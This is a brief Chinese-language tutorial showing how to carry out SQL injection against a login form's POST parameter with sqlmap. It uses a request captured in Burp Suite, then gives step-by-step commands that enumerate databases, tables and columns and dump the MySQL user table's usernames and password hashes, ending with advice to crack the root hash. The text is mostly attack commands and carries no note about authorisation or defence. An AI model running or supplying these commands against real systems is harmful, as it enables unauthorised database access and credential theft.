利用sqlmap进行POST注入

POST注入

    • 1.利用bp获取POST请求包
    • 2.利用sqlmap获取用用户名密码

1.利用bp获取POST请求包

利用sqlmap进行POST注入_第1张图片

2.利用sqlmap获取用用户名密码

sqlmap.py -r a.txt -p username --dbs
注:-r表示加载一个文件,-p指定参数

利用sqlmap进行POST注入_第2张图片
猜数据库获取数据表

sqlmap.py -r a.txt -p username -D mysql --tables

利用sqlmap进行POST注入_第3张图片
猜表获取数据列

sqlmap.py -r a.txt -p username -D mysql -T user --columns

利用sqlmap进行POST注入_第4张图片
猜数据

sqlmap.py -r a.txt -p username -D mysql -T user -C “User,Password” --dump

利用sqlmap进行POST注入_第5张图片
此时就得到了root用户的密码哈希值,解密即可
利用sqlmap进行POST注入_第6张图片

你可能感兴趣的:(工具的使用,post,sql)